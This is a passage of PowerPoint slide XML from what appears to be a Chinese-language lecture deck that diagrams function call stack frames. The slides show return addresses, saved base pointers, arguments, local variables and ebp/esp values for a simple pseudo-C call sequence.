        <p:nvGrpSpPr>
          <p:cNvPr id="117" name="组合 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4C1EB5-F453-4D10-A20C-7F51F048C75C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1289367" y="3841615"/>
            <a:ext cx="658341" cy="721499"/>
            <a:chOff x="1689814" y="3699102"/>
            <a:chExt cx="672661" cy="902630"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="112" name="文本框 111">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EF07D68-7BED-4556-9301-9763C14840C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1690836" y="3699102"/>
              <a:ext cx="671639" cy="385044"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>堆顶</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="113" name="文本框 112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA15DBF-2833-4DD4-A51F-AD137D134383}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1689814" y="4293954"/>
              <a:ext cx="671639" cy="307778"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>堆尾</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0A8E7E-1B4A-4E61-999F-C58D0D95C153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8983050" y="-12125"/>
            <a:ext cx="3208950" cy="1954381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>int main(int argc,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>char *argv[]){             //addr5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>    f_1(arg1_1,arg1_2,…,arg1_m) ;       //addr4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>    f_3(arg2_1,arg2_2,…,arg2_n) ;        //addr1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>    next operation ;                                 //addr0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>    …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>f_1(arg1_1,arg1_2,…,arg1_m){            //addr4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>        f_2(arg_i,arg_j,…,arg_k) ;             //addr3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>        next operation ;                              //addr2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>        …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="96" name="组合 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A87752F-B049-418A-9595-4304B623CDB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8109883" y="4799944"/>
            <a:ext cx="3935550" cy="1948521"/>
            <a:chOff x="7774617" y="4982723"/>
            <a:chExt cx="3962108" cy="1820983"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="矩形 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DD528F5-BEBF-4B59-B5C4-E56972D20437}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7774617" y="4982723"/>
              <a:ext cx="3962108" cy="1820983"/>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4" name="组合 353">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC2A57B-A616-4ED2-974C-8939AF27DC49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7822412" y="5028547"/>
              <a:ext cx="3812177" cy="1729497"/>
              <a:chOff x="3706263" y="2359416"/>
              <a:chExt cx="3695808" cy="1729497"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="356" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2DADCC6-DF89-46E7-AA58-49031EDE282B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3706263" y="3226698"/>
                <a:ext cx="690098" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="357" name="组合 356">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0638B2F7-A298-46E4-9588-8CFA95FDED11}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3706264" y="2359416"/>
                <a:ext cx="3695807" cy="1729497"/>
                <a:chOff x="3789859" y="2393512"/>
                <a:chExt cx="3695807" cy="1729497"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="365" name="组合 364">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFFB2F95-5473-4AE9-947B-84D3BD67B0DD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="3789859" y="2393512"/>
                  <a:ext cx="3695807" cy="1729497"/>
                  <a:chOff x="6964304" y="228815"/>
                  <a:chExt cx="3675103" cy="2139671"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="367" name="Shape 631">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6397760B-3AF4-4D3C-88CF-9839F4CEDA69}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="9359404" y="1848282"/>
                    <a:ext cx="1280003" cy="267375"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="4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200" b="1" dirty="0"/>
                      <a:t>ebp = </a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>addr10</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="368" name="Shape 631">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E513F3B6-CA35-4C33-B115-AD8C3EA1FD6A}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="9353833" y="2164968"/>
                    <a:ext cx="1280003" cy="201689"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5">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200" b="1" dirty="0"/>
                      <a:t>esp = </a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>addr9</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="369" name="组合 368">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13FEDA98-77CE-4F2F-BA48-7766A01D0B74}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="6964304" y="228815"/>
                    <a:ext cx="2390724" cy="2139671"/>
                    <a:chOff x="6964304" y="228815"/>
                    <a:chExt cx="2390724" cy="2139671"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:cxnSp>
                  <p:nvCxnSpPr>
                    <p:cNvPr id="370" name="Shape 640">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61EB5D23-51C6-4BF8-BDB0-6C299322BA96}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvCxnSpPr>
                      <a:cxnSpLocks/>
                    </p:cNvCxnSpPr>
                    <p:nvPr/>
                  </p:nvCxnSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="6964304" y="770259"/>
                      <a:ext cx="686232" cy="0"/>
                    </a:xfrm>
                    <a:prstGeom prst="straightConnector1">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="triangle" w="med" len="med"/>
                    </a:ln>
                  </p:spPr>
                </p:cxnSp>
                <p:cxnSp>
                  <p:nvCxnSpPr>
                    <p:cNvPr id="371" name="Shape 640">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D8D8F38-EA2E-436C-BB5B-0DF7F9D395BB}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvCxnSpPr>
                      <a:cxnSpLocks/>
                    </p:cNvCxnSpPr>
                    <p:nvPr/>
                  </p:nvCxnSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="6964304" y="1842836"/>
                      <a:ext cx="686232" cy="0"/>
                    </a:xfrm>
                    <a:prstGeom prst="straightConnector1">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="triangle" w="med" len="med"/>
                    </a:ln>
                  </p:spPr>
                </p:cxnSp>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="375" name="组合 374">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C36BD130-A31F-4C4E-A78A-E89579C67F09}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvGrpSpPr/>
                    <p:nvPr/>
                  </p:nvGrpSpPr>
                  <p:grpSpPr>
                    <a:xfrm>
                      <a:off x="7063471" y="228815"/>
                      <a:ext cx="2291557" cy="2139671"/>
                      <a:chOff x="7063471" y="228815"/>
                      <a:chExt cx="2291557" cy="2139671"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="376" name="Shape 636">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99ED3F3-A609-4FAF-951E-494849F4144F}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvSpPr/>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="7063729" y="490684"/>
                        <a:ext cx="1271440" cy="396036"/>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000" dirty="0">
                            <a:latin typeface="Consolas"/>
                            <a:ea typeface="Consolas"/>
                            <a:cs typeface="Consolas"/>
                            <a:sym typeface="Consolas"/>
                          </a:rPr>
                          <a:t>addr15</a:t>
                        </a:r>
                        <a:endParaRPr sz="1000" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:endParaRPr>
                      </a:p>
                    </p:txBody>
                  </p:sp>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="377" name="Shape 636">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C6B7121-408F-413D-8A75-AC6DA8EDA336}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvSpPr/>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="7063471" y="1559933"/>
                        <a:ext cx="1270644" cy="383116"/>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000" dirty="0">
                            <a:latin typeface="Consolas"/>
                            <a:ea typeface="Consolas"/>
                            <a:cs typeface="Consolas"/>
                            <a:sym typeface="Consolas"/>
                          </a:rPr>
                          <a:t>addr11</a:t>
                        </a:r>
                        <a:endParaRPr sz="1000" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:endParaRPr>
                      </a:p>
                    </p:txBody>
                  </p:sp>
                  <p:grpSp>
                    <p:nvGrpSpPr>
                      <p:cNvPr id="379" name="组合 378">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0BB1731-0F47-4939-AB3B-F46BBDE127B9}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvGrpSpPr/>
                      <p:nvPr/>
                    </p:nvGrpSpPr>
                    <p:grpSpPr>
                      <a:xfrm>
                        <a:off x="7650535" y="228815"/>
                        <a:ext cx="1704493" cy="2139671"/>
                        <a:chOff x="7650536" y="228815"/>
                        <a:chExt cx="1704492" cy="2139671"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="381" name="Shape 621">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6472EA52-4399-4DF5-B4AB-E64B2C5A5774}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7650539" y="228815"/>
                          <a:ext cx="1704489" cy="270722"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent5">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en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                            <a:t>Return address</a:t>
                          </a:r>
                          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                            <a:solidFill>
                              <a:schemeClr val="accent5"/>
                            </a:solidFill>
                          </a:endParaRPr>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="382" name="Shape 647">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F6D016-A203-4FAB-A17D-9DECAD9AB1D4}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7650538" y="499537"/>
                          <a:ext cx="1704489" cy="270722"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent6">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000" b="1" dirty="0">
                              <a:solidFill>
                                <a:schemeClr val="accent5"/>
                              </a:solidFill>
                            </a:rPr>
                            <a:t>main</a:t>
                          </a:r>
                          <a:r>
                            <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                            <a:t>’s stackbase</a:t>
                          </a:r>
                          <a:endParaRPr sz="1000" b="1" dirty="0"/>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="383" name="Shape 648">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC60044B-FA5C-4D97-8431-F9E1D99D8159}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7650539" y="1037363"/>
                          <a:ext cx="1704489" cy="270721"/>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b="1" dirty="0"/>
                            <a:t>arg1_m~arg1_1</a:t>
                          </a:r>
                          <a:endParaRPr lang="en" sz="1000" b="1" dirty="0"/>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="384" name="Shape 620">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{310BA386-F2C9-45A8-A25B-01E0FFD8476B}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7650536" y="1559934"/>
                          <a:ext cx="1704490" cy="284381"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent5">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altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                            <a:t>Return address = </a:t>
                          </a:r>
                          <a:r>
                            <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                              <a:solidFill>
                                <a:srgbClr val="FF0000"/>
                              </a:solidFill>
                            </a:rPr>
                            <a:t>addr0</a:t>
                          </a:r>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="385" name="Shape 649">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2403F78-EF78-4510-B778-B2EA1211BA67}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7650537" y="1842836"/>
                          <a:ext cx="1704489" cy="267376"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent6">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000" b="1" dirty="0">
                              <a:solidFill>
                                <a:schemeClr val="accent5"/>
                              </a:solidFill>
                            </a:rPr>
                            <a:t>f_3</a:t>
                          </a:r>
                          <a:r>
                            <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0"/>
                            <a:t>’s stackbase = </a:t>
                          </a:r>
                          <a:r>
                            <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" dirty="0">
                              <a:solidFill>
                                <a:srgbClr val="FF0000"/>
                              </a:solidFill>
                            </a:rPr>
                            <a:t>addr15 </a:t>
                          </a:r>
                          <a:endParaRPr sz="1000" b="1" dirty="0">
                            <a:solidFill>
                              <a:srgbClr val="FF0000"/>
                            </a:solidFill>
                          </a:endParaRPr>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="386" name="Shape 650">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F0B46F-D9DD-41AD-AFCD-5E8535007417}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7650537" y="2101110"/>
                          <a:ext cx="1704489" cy="267376"/>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b="1" dirty="0">
                              <a:solidFill>
                                <a:schemeClr val="accent5"/>
                              </a:solidFill>
                            </a:rPr>
                            <a:t>f_3</a:t>
                          </a:r>
                          <a:r>
                            <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                            <a:t>’s local variables</a:t>
                          </a:r>
                          <a:endParaRPr sz="1000" b="1" dirty="0">
                            <a:solidFill>
                              <a:schemeClr val="accent5"/>
                            </a:solidFill>
                          </a:endParaRPr>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="387" name="Shape 651">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C0012D-3ECF-48C1-B205-E0A41F9C5CBA}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7650537" y="1309948"/>
                          <a:ext cx="1704489" cy="262422"/>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b="1" dirty="0"/>
                            <a:t>arg2_n~arg2_1</a:t>
                          </a:r>
                          <a:endParaRPr sz="1000" b="1" dirty="0"/>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="388" name="Shape 650">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F31D9A3-88E4-4474-BF86-8085E2CEEEAA}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr/>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="7650538" y="769985"/>
                          <a:ext cx="1704489" cy="272859"/>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000" b="1" dirty="0">
                              <a:solidFill>
                                <a:schemeClr val="accent5"/>
                              </a:solidFill>
                            </a:rPr>
                            <a:t>main</a:t>
                          </a:r>
                          <a:r>
                            <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
                            <a:t>’s local variables</a:t>
                          </a:r>
                          <a:endParaRPr sz="1000" b="1" dirty="0">
                            <a:solidFill>
                              <a:schemeClr val="accent5"/>
                            </a:solidFill>
                          </a:endParaRPr>
                        </a:p>
                      </p:txBody>
                    </p:sp>
                  </p:grpSp>
                </p:grpSp>
              </p:grpSp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="359" name="组合 358">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
